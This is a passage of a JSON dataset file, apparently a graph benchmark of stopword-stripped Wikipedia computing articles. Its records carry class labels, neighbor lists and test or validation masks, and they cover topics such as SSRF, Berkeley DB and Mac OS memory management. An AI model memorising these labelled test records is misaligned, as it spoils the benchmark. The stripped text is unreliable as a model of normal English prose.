multifaceted system enabling international counterfeit market far united kingdom scotland erie representatives taken initiatives using law enforcement criminal charges fight counterfeiting piracy social media accounts concern still needs tremendous effort updating enforcement policies online counterfeiting emerging solutions suggested world trademark review packaging engineered help reduce risks package pilferage theft resale products package constructions resistant pilferage pilfer indicating seals counterfeit consumer goods unauthorized sales diversion material substitution tampering reduced anti-counterfeiting technologies packages may include authentication seals use security printing help indicate package contents counterfeit subject counterfeiting packages also include anti-theft devices dye-packs rfid tags electronic article surveillance tags activated detected devices exit points require specialized tools deactivate anti-counterfeiting technologies used packaging include increasing sophistication counterfeiters techniques increasing need designers technologists develop even creative solutions distinguish genuine products frauds incorporating unique less obvious aspects identification design goods one impressive techniques exploits anisotropic optical characteristics conjugated polymers engineers developed specialized markings patterns incorporated within designs textiles detected polarized lights similar methods implemented production currency invisible threads dyes used create unique designs within weaves luxury textiles replicated counterfeiters due unique set fibres anisotropic tapes polymer dyes used brand manufacturer",
    "neighbors": [
      5433,
      10163,
      10173
    ],
    "mask": "None"
  },
  {
    "node_id": 1589,
    "label": 4,
    "text": "Man-on-the-side_attack:man-on-the-side attack man-on-the-side attack form active attack computer security similar man-in-the-middle attack instead completely controlling network node man-in-the-middle attack attacker regular access communication channel allows read traffic insert new messages modify delete messages sent participants attacker relies timing advantage make sure response sends request victim arrives legitimate response real-world attacks response packet sent attacker used place malware victim computer need timing advantage makes attack difficult execute requires privileged position network example internet backbone 2013 global surveillance revelations revealed us national security agency nsa widely uses man-on-the-side attack infect targets malware quantum program",
    "neighbors": [
      7887,
      7893,
      8726,
      7515,
      2558,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 1590,
    "label": 7,
    "text": "AstroPrint:astroprint astroprint cloud platform application marketplace designed consumer 3d printing 3dagogo inc. private san diego based technology company astroprint develops software enable management desktop 3d printers web enabled device without requiring technical expertise astroprint claims unifying software platform fragmented consumer 3d printing space may 2014 part betaspring seed accelerator astroprint successfully raised 40,314 met funding goal single day using crowdfunding website kickstarter subsequently astroprint attended graduated 500 startups seed accelerator mountain view ca astroprint maintains partnerships national institutes health 3d hubs i.materialise 3d slash 3d printer manufacturer airwolf 3d ships 3d printers astroprint software integrated investors astroprint include dave mcclure bunker dave hodson co-founder cto messagecast inc. christine tsai may 8th 2017 astroprint successfully met funding goal 3 hours crowdfunding website kickstarter astrobox touch cloud-enabled touchscreen desktop 3d printing campaign ended 603 backers raising 74,781 bring astrobox touch life kickstarter astroprint also released desktop mobile apps along public api enhance 3d printing experience platform january 15 2015 astroprint covered techcrunch may 18 2015 astroprint editors choice award maker faire make magazine july 27 2015 san diego business journal wrote astroprint instrumental enabling dr. peter manning national institutes health printing 3-dimensional models two-year-old boy heart network vessels caused breathing problems astroprint reduced hundreds settings usually required 3d printers three tech cocktail named astroprint 3d printing top 5 technologies vcs fund 2015 january 5 2016 astroprint unveiled joint project 3 billion technology giant marvell ces 2016 las vegas nevada project involved designing consumer-friendly 3d printer containing embedded software astroprint using kinoma platform according journalists media personnel printer accessible invite-only basis private ballroom within ces may 2017 astroprint second successful crowdfunding campaign covered san diego business journal solidsmack nbc fabbaloo inside3dprinting 3dprint.com all3dp october 2017 astroprint released cross-platform mobile desktop apps desktop 3d printing november 10th 2017 astroprint released toy maker mobile app allows children 3d print toys home toy maker also used demonstrate content delivery capabilities astroprint platform astroprint works taking user uploaded stl file adding supports slicing saving g-code user account online user access download modify print models wirelessly via 3d printer astroprint built combination 3d printing software cura repetier-host slic3r octoprint astroprint also allows users remotely monitor 3d printer real time web-enabled device astroprint compatible consumer 3d printers astrobox gateway open source software run raspberry pi astroprint also released cross-platform mobile desktop software manage 3d printers addition developers able use astroprint api develop third party applications 3d printer owners astroprint platform astroprint aimed general non-technical consumer plug play inclusive platform 3d printing require technical understanding",
    "neighbors": [
      1849,
      5612,
      4121
    ],
    "mask": "Test"
  },
  {
    "node_id": 1591,
    "label": 9,
    "text": "Dynamic_programming_language:dynamic programming language dynamic programming language computer science class high-level programming languages runtime execute many common programming behaviours static programming languages perform compilation behaviors could include extension program adding new code extending objects definitions modifying type system although similar behaviors emulated nearly language varying degrees difficulty complexity performance costs dynamic languages provide direct tools make use many features first implemented native features lisp programming language dynamic languages also dynamically typed dynamic languages frequently always referred scripting languages although term scripting language narrowest sense refers languages specific given run-time environment dynamic languages offer eval function function takes string parameter containing code language executes code stands expression resulting value returned however erik meijer peter drayton suggests programmers use eval poor man substitute higher-order functions type object system typically modified runtime dynamic language mean generating new objects runtime definition based mixins existing types objects also refer changing inheritance type tree thus altering way existing types behave especially respect invocation methods reflection common many dynamic languages typically involves analysis types metadata generic polymorphic data however also include full evaluation modification program code data features lisp provides analyzing s-expressions limited number dynamic programming languages provide features combine code introspection ability examine classes functions keywords know know eval feature called macros programmers today aware term macro encountered c c++ static feature built small subset language capable string substitutions text program dynamic languages however provide access inner workings compiler full access interpreter virtual machine runtime allowing definition language-like constructs optimize code modify syntax grammar language assembly c c++ early java fortran generally fit category following examples show dynamic features using language common lisp common lisp object system clos example shows function modified runtime computed source code example shows existing instance changed include new slot class changes existing method replaced new version next example class person gets new superclass print method gets redefined assembles several methods effective method effective method gets assembled based class argument runtime available applicable methods popular dynamic programming languages include javascript python ruby php lua perl following generally considered dynamic languages many use term scripting languages",
    "neighbors": [
      9224,
      2062,
      6160,
      5651,
      1051,
      3613,
      9245,
      6182,
      5165,
      5677,
      5680,
      9780,
      6718,
      10819,
      8262,
      5703,
      7267,
      9330,
      9331,
      2680,
      9345,
      2691,
      4231,
      6795,
      9877,
      8854,
      7326,
      4770,
      4777,
      6313,
      9385,
      692,
      191,
      5314,
      5830,
      9926,
      5833,
      5845,
      7395,
      8421,
      4838,
      7398,
      9960,
      10470,
      8430,
      9454,
      7421,
      6910,
      5395,
      6933,
      10011,
      11555,
      7461,
      6950,
      11559,
      11574,
      823,
      4410,
      10042,
      348,
      9055,
      6502,
      8554,
      10097,
      7026,
      9078,
      3960,
      3462,
      8582,
      11670,
      5527,
      9626,
      1435,
      4507,
      1952,
      8609,
      11683,
      5031,
      6074,
      8644,
      3529,
      4042,
      11219,
      10198,
      5081,
      477,
      7646,
      3051,
      10228,
      2556,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1592,
    "label": 2,
    "text": "Mac_OS_memory_management:mac os memory management historically classic mac os used form memory management fallen favor modern systems criticism approach one key areas addressed change original problem engineers macintosh make optimum use 128 kb ram machine equipped motorola 68000-based computer hardware support virtual memory since time machine could run one application program time fixed secondary storage engineers implemented simple scheme worked well particular constraints design choice scale well development machine creating various difficulties programmers users primary concern original engineers appears fragmentation repeated allocation deallocation memory pointers leading many small isolated areas memory used small even though total free memory may sufficient satisfy particular request memory solve apple engineers used concept relocatable handle reference memory allowed actual data referred moved without invalidating handle apple scheme simple handle simply pointer non relocatable table pointers turn pointed data memory request required compaction memory done table called master pointer block updated machine implemented two areas memory available scheme system heap used os application heap long one application time run system worked well since entire application heap dissolved application quit fragmentation minimized memory management system weaknesses system heap protected errant applications would possible system architecture supported memory protection frequently cause system problems crashes addition handle-based approach also opened source programming errors pointers data within relocatable blocks could guaranteed remain valid across calls might cause memory move real problem almost every system api existed transparency system-owned data structures time apis could little solve thus onus programmer create pointers least manage carefully dereferencing handles every api call since many programmers generally familiar approach early mac programs suffered frequently faults arising palm os 16-bit windows use similar scheme memory management palm windows versions make programmer error difficult instance mac os convert handle pointer program de-references handle directly handle locked pointer become invalid quickly calls lock unlock handles balanced ten calls hlock undone single call hunlock palm os windows handles opaque type must de-referenced memhandlelock palm os global/locallock windows palm windows application finished handle calls memhandleunlock global/localunlock palm os windows keep lock count blocks three calls memhandlelock block become unlocked three calls memhandleunlock addressing problem nested locks unlocks straightforward although tedious employing various methods intrude upon readability associated code block require awareness discipline part coder awareness discipline also necessary avoid memory leaks failure deallocate within scope allocation avoid references stale handles release usually resulted hard crash—annoying single-tasking system potentially disastrous programs running situation worsened advent switcher way mac 512kb memory run multiple applications necessary step forward users found one-app-at-a-time approach limiting apple committed memory management model well compatibility existing applications forced adopt scheme application allocated heap available ram amount actual ram allocated heap set value coded metadata application set programmer sometimes value n't enough particular kinds work value setting exposed user allow tweak heap size suit requirements popular among power users exposure technical implementation detail grain mac user philosophy apart exposing users esoteric technicalities inefficient since application would made grab allotted ram even left subsequently unused another application might memory starved would unable utilize free memory owned another application application could beneficially utilize sister application heap could certainly destroy typically inadvertently writing nonsense address application accidentally treating fragment text image unassigned location pointer could easily overwrite code data applications even os leaving lurkers even program exited problems could extremely difficult analyze correct switcher evolved multifinder system 4.2 became process manager system 7 scheme long entrenched apple made attempts work around obvious limitations – temporary memory one application could borrow free ram lay outside heap short periods unpopular programmers largely failed solve problems apple system 7 tune-up addon added minimum memory size preferred size—if preferred amount memory available program could launch minimum space possibly reduced functionality incorporated standard os starting system 7.1 still n't address root problem virtual memory schemes made memory available paging unused portions memory disk made available third-party utilities like connectix virtual apple system 7 increased macintosh memory capacity performance cost add protected memory prevent memory manager heap compaction would invalidate pointers originally macintosh 128 kb ram limit 512 kb increased 4 mb upon introduction macintosh plus macintosh computers used 68000 cpu 32-bit processor 24 physical address lines 24 lines allowed processor address 16 mb memory 2 bytes seen sufficient amount time ram limit macintosh design 4 mb ram 4 mb rom structure memory map fixed changing memory map macintosh ii macintosh portable allowing 8 mb ram memory scarce resource authors mac os decided take advantage unused byte address original memory manager advent system 7 placed flags high 8 bits 32-bit pointer handle address contained flags locked purgeable resource stored master pointer table used actual address flags masked ignored cpu good use limited ram space design caused problems apple introduced macintosh ii used 32-bit motorola 68020 cpu 68020 32 physical address lines could address 4 gb 2 bytes memory flags memory manager stored high byte pointer handle significant could lead addressing errors theory architects macintosh system software free change flags high byte scheme avoid problem example macintosh iici later machines hlock apis rewritten implement handle locking way flagging high bits handles many macintosh application programmers great deal macintosh system software code accessed flags directly rather using apis hlock provided manipulate rendered applications incompatible true 32-bit addressing became known 32-bit clean order stop continual system crashes caused issue system 6 earlier running 68020 68030 would force machine 24-bit mode would recognize address first 8 megabytes ram obvious flaw machines whose hardware wired accept 128 mb ram – whose product literature advertised capability system 7 mac system software finally made 32-bit clean still problem dirty roms problem decision use 24-bit 32-bit addressing made early boot process rom routines initialized memory manager set basic mac environment nubus roms disk drivers loaded executed older roms 32-bit memory manager support possible boot 32-bit mode surprisingly first solution flaw published software utility company connectix whose 1991 product mode32 reinitialized memory manager repeated early parts mac boot process allowing system boot 32-bit mode enabling use ram machine apple licensed software connectix later 1991 distributed free macintosh iici later motorola based macintosh computers 32-bit clean roms quite applications updated remove 24-bit dependencies system 7 provided way switch back 24-bit mode application incompatibilities found time migration powerpc system 7.1.2 32-bit cleanliness mandatory creating native applications even later motorola 68040 based macs could support 24-bit mode rise object-oriented languages programming mac – first object pascal later c++ – also caused problems memory model adopted first would seem natural objects would implemented via handles gain advantage relocatable languages originally designed used pointers objects would lead fragmentation issues solution implemented think later symantec compilers use handles internally objects use pointer syntax access seemed good idea first soon deep problems emerged since programmers could tell whether dealing relocatable fixed block way know whether take task locking objects needless say led huge numbers bugs problems early object implementations later compilers attempt used real pointers often implementing memory allocation schemes work around mac os memory model mac os memory model inherent problems remained way right mac os 9 due severe application compatibility constraints increasing availability cheap ram meant large users could upgrade way corner memory n't used efficiently abundant enough issue never became critical ironic given purpose original design maximise use limited amounts memory finally away whole scheme implementing modern sparse virtual memory scheme subset older memory model apis still exist compatibility part carbon map modern memory manager threadsafe malloc implementation underneath apple recommends code use malloc free almost exclusively",
    "neighbors": [
      11649,
      4741,
      1542,
      7305,
      3598,
      5520,
      11539,
      11037,
      1952,
      6048,
      7842,
      11171,
      4910,
      8114,
      9778,
      3512,
      576,
      713,
      4810,
      9035,
      2383,
      2768,
      213,
      3167,
      9569,
      9700,
      7269,
      8551,
      6377,
      4844,
      5619,
      7286,
      7163,
      3324
    ],
    "mask": "Test"
  },
  {
    "node_id": 1593,
    "label": 2,
    "text": "Single-level_store:single-level store single-level storage sls single-level memory computer storage term two meanings two meanings related pages memory may primary storage ram secondary storage disk however current actual physical location page unimportant process originally meant usually called virtual memory introduced 1962 atlas system manchester usually refers organization computing system files persistent objects sometimes called segments mapped processes address spaces consist entirely collection mapped objects entire storage computer thought single two-dimensional plane addresses segment address within segment persistent object concept first introduced multics mid-1960s project shared mit general electric bell labs also implemented virtual memory actual physical implementation including number levels storage types multics instance three levels originally main memory high-speed drum disks sls often associated ibm formerly known i5/os os/400 operating system ibm system although ibm first implemented sls 1978 system/38 control program facility cpf operating system predecessor ibm single-level storage entire storage computer thought single two-dimensional plane addresses pointing pages pages may primary storage ram secondary storage disk however current location address unimportant process operating system takes responsibility locating pages making available processing page primary storage immediately available page disk page fault occurs operating system brings page primary storage explicit i/o secondary storage done processes instead reads secondary storage done result page faults writes secondary storage done pages modified since read secondary storage primary storage written back location secondary storage ibm design single-level storage originally conceived pioneered frank soltis glenn henry late 1970s way build transitional implementation computers 100 solid state memory thinking time disk drives would become obsolete would replaced entirely form solid state memory system/38 designed independent form hardware memory used secondary storage come however solid state memory become exponentially cheaper disk drives also become similarly cheaper thus price ratio favour disk drives continues much higher capacities solid state memory much slower access much less expensive ibm operating system believes access almost unlimited storage array 'real memory i.e. primary storage address translator maps available real memory physical memory residing disk drives either 'spinning solid-state san server v7000 operating system simply places object address memory space os n't know care object physically memory slower disk-storage device licensed internal code atop os runs handles page faults object pages physical memory reading page available page frame primary storage ibm implementation single-level storage page faults divided two categories database faults non-database faults database faults occur page associated relational database object like table view index currently primary storage non-database faults occur type object currently primary storage ibm treats secondary storage single pool data rather collection multiple pools file systems usually done operating systems systems like unix-like systems microsoft windows intentionally scatters pages objects across disks objects stored retrieved much rapidly result ibm server rarely becomes disk bound single-level storage operating systems also allow cpu memory disk resources freely substituted run time smooth performance bottlenecks",
    "neighbors": [
      2432,
      1801,
      6797,
      11539,
      5397,
      2966,
      3615,
      9762,
      10921,
      7983,
      7728,
      8627,
      964,
      4423,
      2120,
      4424,
      11596,
      5598,
      2804,
      6772
    ],
    "mask": "Test"
  },
  {
    "node_id": 1594,
    "label": 1,
    "text": "Berkeley_DB:berkeley db berkeley db bdb software library intended provide high-performance embedded database key/value data berkeley db written c api bindings c++ c java perl php python ruby smalltalk tcl many programming languages bdb stores arbitrary key/data pairs byte arrays supports multiple data items single key berkeley db relational database bdb support thousands simultaneous threads control concurrent processes manipulating databases large 256 terabytes wide variety operating systems including unix-like windows systems real-time operating systems bdb commercially supported developed sleepycat software 1996 2006 company acquired oracle corporation february 2006 continues develop sell berkeley db oracle stewardship berkeley db become common brand name three distinct products oracle berkeley db berkeley db java edition berkeley db xml three products share common ancestry currently active development berkeley db originated university california berkeley part bsd berkeley version unix operating system 4.3bsd 1986 bsd developers attempted remove replace code originating original unix bsd derived needed rewrite unix database package seltzer yigit created new database unencumbered patents on-disk hash table outperformed existing dbm libraries berkeley db first released 1991 later included 4.4bsd 1996 netscape requested authors berkeley db improve extend library version 1.86 suit netscape requirements ldap server use netscape browser request led creation sleepycat software company acquired oracle corporation february 2006 continues develop sell berkeley db since initial release berkeley db gone various versions major release cycle introduced single new major feature generally layering top earlier features add functionality product 1.x releases focused managing key/value data storage referred data store ds 2.x releases added locking system enabling concurrent access data known concurrent data store cds 3.x releases added logging system transactions recovery called transactional data store tds 4.x releases added ability replicate log records create distributed highly available single-master multi-replica database called high availability ha feature set berkeley db evolution sometimes led minor api changes log format changes rarely database formats changed berkeley db ha supports online upgrades one version next maintaining ability read apply prior release log records freebsd openbsd operating systems continue use berkeley db 1.8x compatibility reasons linux-based operating systems commonly include several versions accommodate applications still using older interfaces/files starting 6.0/12c releases berkeley db products licensed gnu agpl berkeley db je 7.3.7 licensed apache license version 2.0 previously berkeley db redistributed 4-clause bsd license version 2.0 sleepycat public license osi-approved open-source license well fsf-approved free software license product ships complete source code build script test suite documentation code quality general utility along licensing terms led use multitude free open-source software wish abide terms gnu agpl use older version sleepycat public license option purchasing another proprietary license redistribution oracle corporation technique called dual licensing different versions berkeley db db je xml may different licensing terms berkeley db includes compatibility interfaces historic unix database libraries dbm ndbm hsearch system v library creating in-memory hash tables berkeley db architecture notably simpler database systems like relational database management systems example like sqlite provide support network access programs access database using in-process api calls oracle added support sql 11g r2 release based popular sqlite api including version sqlite berkeley db uses berkley db storage third party support pl/sql berkeley db via commercial product named metatranz stepsqlite program accessing database free decide data stored record berkeley db puts constraints record data record key four gigabytes long despite simple architecture berkeley db supports many advanced database features acid transactions fine-grained locking hot backups replication name berkeley db given three different products edition separate database libraries despite common branding first traditional berkeley db written c. contains several database implementations including b-tree one built around extensible hashing supports multiple language bindings including c/c++ java via jni c .net perl python berkeley db java edition je pure java database management library design resembles berkeley db without replicating exactly feature set includes many found traditional berkeley db others specific java edition log structured storage architecture gives different performance concurrency characteristics three apis available direct persistence layer plain old java objects pojo one based java collections framework object persistence approach one based traditional berkeley db api berkeley db java edition high availability option replication available note traditional berkeley db also supports java api via jni thus requires installed native library berkeley db xml database specializes storage xml documents supporting xquery via xqilla implemented additional layer top legacy version berkeley db xerces library db xml written c++ supports multiple language bindings including c++ java via jni perl python berkeley db provides underlying storage retrieval system several ldap servers database systems many proprietary free/open source applications notable software use berkeley db data storage include berkeley db v2.0 higher available dual license",
    "neighbors": [
      9344,
      5249,
      10242,
      1539,
      8582,
      2061,
      6797,
      9997,
      5397,
      2710,
      2966,
      8984,
      1305,
      1049,
      1306,
      1307,
      9245,
      9366,
      9631,
      6433,
      8353,
      8994,
      3366,
      6775,
      8871,
      10921,
      5546,
      1707,
      7339,
      5677,
      1454,
      7983,
      9010,
      2995,
      692,
      9012,
      10292,
      4919,
      5560,
      10553,
      9151,
      10048,
      9665,
      6338,
      1988,
      6341,
      8262,
      8644,
      9286,
      8393,
      10693,
      597,
      1755,
      6107,
      2269,
      6365,
      6369,
      1250,
      3427,
      10340,
      5096,
      8554,
      9067,
      494,
      7022,
      8434,
      499,
      2804,
      5492,
      1399,
      6651,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1595,
    "label": 2,
    "text": "System_V_Interface_Definition:system v interface definition system v interface definition svid standard describes unix system v behavior including system calls c libraries available programs devices first attempt standardizations document industry trade association /usr/group published standard 1984 based system iii system call additions bsd important effort early standardization unix period unix variants multiplying rapidly portability problematic best 1986 required conformance svid issue 2 vendors actually brand products system v r3 1990s however importance largely eclipsed posix single unix specification based part upon svid part reason undoubtedly vendor-independent approach see unix wars",
    "neighbors": [
      3241,
      2995,
      7460
    ],
    "mask": "None"
  },
  {
    "node_id": 1596,
    "label": 3,
    "text": "Romancia:romancia also known dragon slayer jr. action-adventure game developed nihon falcom 1986 pc-8801 pc-9801 msx sharp x1 computers later famicom version published tokyo shoseki enhanced remake released windows 1999 unbalance third dragon slayer series preceded followed dragon slayer iv romancia simpler brightly colored game comparison dragon slayer titles hence name dragon slayer jr. game begins prince outside castle xanadu fan speak king free equipment goal rescue princess within 30 minutes movement controlled arrow keys attacking done action key unlike xanadu almost statistics zero customization game consists largely two screens small sub-areas player thirty minutes complete game illustrating light accessible nature title versus oppressive underground complexes xanadu despite game still rather unforgiving player likely need use trial error walkthrough solve puzzles",
    "neighbors": [
      770,
      3113,
      10217,
      6797,
      9006,
      10931,
      11443,
      9658
    ],
    "mask": "None"
  },
  {
    "node_id": 1597,
    "label": 4,
    "text": "Server-side_request_forgery:server-side request forgery computer security server-side request forgery ssrf type exploit attacker abuses functionality server causing access manipulate information realm server would otherwise directly accessible attacker similar cross-site request forgery utilises web client example web browser within domain proxy attacks ssrf attack utilises insecure server within domain proxy",
    "neighbors": [
      2558,
      3473,
      4725,
      2470
    ],
    "mask": "None"
  },
  {
    "node_id": 1598,
    "label": 2,
    "text": "2015_Windows_10_400:2015 windows 10 400 2015 windows 10 400 nascar sprint cup series race held august 2 2015 pocono raceway long pond pennsylvania contested 160 laps 2.5 mile 4 km triangular superspeedway 21st race 2015 nascar sprint cup series season matt kenseth race second season brad keselowski finished second jeff gordon finished third dale earnhardt jr. greg biffle rounded top five kyle busch pole race led 19 laps leading race running fuel final lap finished 21st joey logano led race high 97 laps running fuel three laps go finished 20th race 18 lead changes among 13 different drivers eight caution flag periods 32 laps one red flag period lasted 14 minutes 32 seconds 33rd career victory matt kenseth second season first pocono raceway tenth track joe gibbs racing kenseth left pocono trailing kevin harvick 118–points points standings despite winning manufacturer toyota left pocono trailing chevrolet 75–points manufacturer standings pulled within one–point ford second standings windows 10 400 carried nbc sports cable/satellite nbcsn network american television audience radio broadcast race carried motor racing network sirius xm nascar radio pocono raceway formerly pocono international raceway also known tricky triangle superspeedway located pocono mountains pennsylvania long pond site two annual nascar sprint cup series races held weeks apart june august one nascar camping world truck series event august since 2013 track also host verizon indycar series race pocono one nascar tracks owned either speedway motorsports inc. international speedway corporation dominant track owners nascar run igdalsky siblings brandon nicholas sister ashley cousins joseph iv chase mattioli third-generation members family-owned mattco inc started joseph ii rose mattioli mattco also owns south boston speedway south boston virginia outside nascar races pocono used throughout year sports car club america scca motorcycle clubs well racing schools triangular oval also three separate infield sections racetrack – north course east course south course infield sections use separate portion tri-oval complete track regular non-race weekends multiple clubs use track running different infield sections also infield sections run either direction multiple infield sections put together – running north course south course using tri-oval connect two kevin harvick entered pocono 69-point lead joey logano dale earnhardt jr. entered 100 back jimmie johnson entered 102 back martin truex jr. entered 109 back following axalta paint winners 400 june section tunnel turn – turn 2 – milled leveled repaved done eliminate bumps develop foundation track surface goes tunnel team haulers use get track settles ground entry list windows 10 400 released monday july 27 11:20 a.m. eastern time forty-three drivers entered race entered previous week race indianapolis three driver changes race 33 hillman-circle sport llc chevrolet driven alex kennedy premium motorsports duo swapped rides weekend timmy hill driving 62 chevrolet reed sorenson driving 98 ford brad keselowski fastest first practice session time 50.961 speed kyle busch pole time 50.444 speed “ told fast car ’ sure could get balance right ” busch said winning pole “ crew chief adam stevens guys again. ” “ lot lies putting lap together something ’ done last couple months ” kevin harvick said qualifying second “ feel like good job made good adjustments feel like probably gave little bit turn 1 got little bit tight center corner all-in-all good lap ’ glad ran fastest speed last round do. ” “ bad ” tony stewart said qualifying fifth “ crew chief chad johnston came practice session qualifying showed stuff losing time focused qualifying worked. ” “ pretty good final round quite good enough get pole ” said brad keselowski qualifying ninth “ missing little bit one corners all-in-all good effort fastest car practice feel pretty good similar brickyard really strong needed little win optimistic sure. ” “ really struggled whatever reason turn 1 today ” said martin truex jr. qualifying 13th “ ’ seem get balance right either tight loose matter fought thing big deal though think okay ’ got plenty time figure tomorrow ’ got cars pass 13th bad last week. ” carl edwards fastest second practice session time 51.191 speed kyle busch fastest final practice session time 51.358 speed jeb burton forced go backup car wrecking inside pit road wall change took place qualifying started race rear field race scheduled start 1:46 p.m. started four minutes later kyle busch led field green flag first caution race flew fifth lap kasey kahne got loose frontstretch coming turn 3 slid track slammed inside wall lining pit road almost identical manner happened jeb burton final practice day “ well first ’ believe clear late corner way left heading towards pit wall ” kahne said “ saw people thought guys need take running get way ’ know ’ done anything like kind crazy way happened. ” kahne uninjured released infield care center minutes later car damaged beyond repair finished dead last race red-flagged allow nascar evaluate repair wall 14-minute 43 second delay red flag withdrawn field continued caution race restarted lap 10 second caution race flew lap 16 scheduled competition caution section track washed following previous day arca race cars opted pit kevin harvick assumed race lead a. j. allmendinger tagged uncontrolled tire restarted race tail-end field race restarted lap 20 third caution race flew lap harvick blew engine turn 3 first dnf since last year duck commander 500 texas motor speedway “ coming turn 2 knew issues n't realize going big really proud team harvick said car fast 'll days like race restarted lap 24 fourth caution race flew lap 28 sam hornish jr. cut left-front tire turn 1 got rear-ended ricky stenhouse jr. slammed wall everything happening real fast said stenhouse walked away uninjured saw 9 hornish turn 3 run track thought got loose everything fine getting turn 1 car front ducked last minute 9 sitting got brakes really hard think got splitter could n't go left right ran right good day us guess 9 missed shift something n't aware 35 cole whitt one cars pulled real quick 9 sitting time reacted late ran right back one days hornish said missed shift restart n't good tire come apart got hit deal right busch kurt trying hold saw got straightened back one things everything stops smoking long enough think back control wobbling around unfortunate us sure ... love coming pocono good runs led laps felt like could win races n't us year hopefully n't carry watkins glen next weekend race restarted lap 34 defending pocono winner martin truex jr. front made first stop lap 39 gave lead joey logano jimmie johnson pitted second lap 44 logano ducked onto pit road lap 52 handed lead kyle busch surrendered lead pit next lap handed teammate denny hamlin dale earnhardt jr. tagged speeding pit road forced serve drive-through penalty hamlin pitted lead lap 55 handed brad keselowski pitted lap 57 handed lead jeff gordon 2 tagged uncontrolled tire colliding tire carrier forced serve drive-through penalty gordon pitted lap 59 handed lead danica patrick uncontrolled tire 2 pit stall brought fifth caution race lap 62 pitted caution lead cycled back joey logano jeb burton tagged speeding pit road restarted race tail-end field race restarted lap 66 sixth caution race flew lap kurt busch got turned paul menard t-boned sam hornish jr race restarted lap 72 seventh caution race flew lap dale earnhardt jr. made contact cole whitt turn 1 went spinning race restarted lap 76 busch pitted second lap 88 started round green flag stops logano pitted next lap gave lead matt kenseth gave lead pit next lap handed kyle larson eighth caution race flew lap 91 alex kennedy backed wall turn 1 clint bowyer caught caution pitted pit road closed result restarted race tail-end field larson pitted caution handed lead joey logano race restarted lap 98 field settled green flag run lap 123 joey logano surrendered lead pit handed lead denny hamlin pitted next lap handed lead david ragan ducked onto pit road 35 laps go handed lead greg biffle brett moffitt tagged speeding pit road forced serve drive-through penalty biffle hit pit road 34 laps go handed lead jeff gordon casey mears tagged many men wall forced serve drive-through penalty gordon surrendered lead pit 33 laps go lead cycled back joey logano logano maintained one-second lead kyle busch ten laps go chance short fuel ultimately ran fuel long pond straightaway three go busch took lead lap later truex ran fuel well last lap busch ran fuel front–stretch passed matt kenseth – taken white flag 15 seconds behind busch – turn 2 went take checkered flag “ feels good get one today ” said kenseth “ ’ nothing like wins never thought ’ ever win pocono never thought ’ win fuel mileage race today. ” “ guess numbers crew chief todd gordon said good enough make half lap ” said joey logano running gas finishing 20th “ saving fuel cushion thought going good started running knew ’ going make tough everything right today. ” running tire carrier lap 57 serving drive–through penalty uncontrolled tire sent back 37th brad keselowski rallied back runner–up finish fuel came play end able take care bring home second respectable day keselowski said certainly going finish without fuel sometimes works think teammate team phenomenal job heartbroken win race jeff gordon running 16th four laps go took advantage cars running fuel finish third – matching best finish season – 46th final career start pocono raceway thought trying get maybe 10th 12th sudden said 'you 're third think probably shocked person racetrack found gordon said race knew cars peeling n't realize many either running coming pit road teammate dale earnhardt jr. 17th four go rallied fourth-place finish 've got work harder said car n't good weekend corner lot balance issues never really cured held us n't good earlier year still top-10 top-five car barely top-five car thought good enough car win came earlier summer lost little balance nbc sports covered race television side rick allen jeff burton steve letarte call booth race dave burns mike massaro marty snider kelli stavast handled pit road television side mrn radio call race simulcast sirius xm nascar radio joe moore jeff striegle four time pocono winner rusty wallace called race booth field racing front stretch dave moody called race billboard outside turn 1 field racing turn 1 mike bagley called race billboard outside turn 2 field racing turn 2 kyle rickey called race billboard outside turn 3 field racing turn 3 woody cain glenn jarrett steve post worked pit road radio side",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 1599,
    "label": 3,
    "text": "A-Train:a-train first iteration a-train series released december 1985 fm-7 nec pc-8801 nec pc-9801 x1 turbo mz-2500 famicom msx2 windows 95/98 port followed april 2000 second iteration a-train series released july 1988 nec pc-9801 sharp x68000 usa released name railroad empire take a-train iii known internationally a-train third game a-train series originally developed published japanese game developer artdink japan later published maxis united states originally released december 1990 nec pc-9801 fm towns marty sharp x68000 pc engine turbografx-16 us version released october 1992 dos amiga later japanese version re-released march 2000 windows 95 98 artdink ported a-train iii along editor windows 95 published titles package 3rd artdink best choice title japan game puts players command railway company rival companies player controls one city game resultingly fairly open-ended a-train iii first game series make use near-isometric dimetric projection present city similar maxis later simcity 2000 two types transport player company take passengers building materials former likely profitable building materials allow city grow wherever building materials delivered taken used construct buildings city start houses eventually area grows roads shops buildings built provide extra revenue passenger service also allowing city develop grow seen goal well buildings built computer response materials present player construct buildings ski resorts hotels make profits conditions right a.iii map construction known internationally a-train construction set editor change existing saved games build landscapes scratch comes 6 sample maps maxis also published a-train construction set a-train single package europe without ocean software label game tremendously popular japan thus motivating maxis license us distribution a-train available dos macintosh amiga platforms released october 1992 though sold poorly even release add-on pack game failed stir real support amongst gaming community game first major failure maxis computer gaming world reviewer stated 1992 enjoyed financial management aspects a-train many people miss fine program steeply graded learning curve game reviewed 1992 dragon 187 hartley patricia kirk lesser role computers column reviewers gave game 4 5 stars 1993 game received codie award software publishers association best strategy program a-train isometric tile-based graphics animated elements inspired visual style maxis went adopt simcity 2000 1993 1994 pc gamer uk named a-train iii 46th best computer game time editors wrote fascinating absorbing quite cheap a-train worth place games collection — n't put subject matter brilliant fun simulation game involving construction railroad order boost city mass transit system game released exclusively japanese market release ever attempted north american european markets player must use resources hand build railroad connecting two ends map scenario train controlled throughout day 05:00-17:00 building new tracks stations nighttime activities 17:00-05:00 involve changing train schedules better suit needs player growing mass transportation hub new developments spring around tracks stations permits player increase amount money earn resulting increased ability build railroad tracks stations growing city five scenarios offer tutorial mode first-time players extremely hard scenario veterans three scenarios players two extremes difficulty levels players play using speeds range slow normal fast released december 1993 nec pc-9801 fm towns marty windows 3.1 windows 95 later re-released march 17 2000 windows 95 98 title a-train 4 15th anniversary march 26 2004 name a-train 4 xp time including support windows 2000 xp related versions include japan-only console launch title release aiv evolution december 1994 ps1 aiv evolution global released title a-train north america also ps1 re-released january 2007 psp ps3 aiv network known c.e.o north america 1995 ms-dos windows 3.1 also released north america train evolution pack included playstation version aiv evolution global playstation mouse train mousepad playstation memory card release famitsu ps scored japanese playstation version aiv evolution 27 40 five months later famitsu magazine reader cross review gave 9 10 following week famitsu scored 31 40 four reviewers electronic gaming monthly divided playstation version aiv evolution global andrew baran 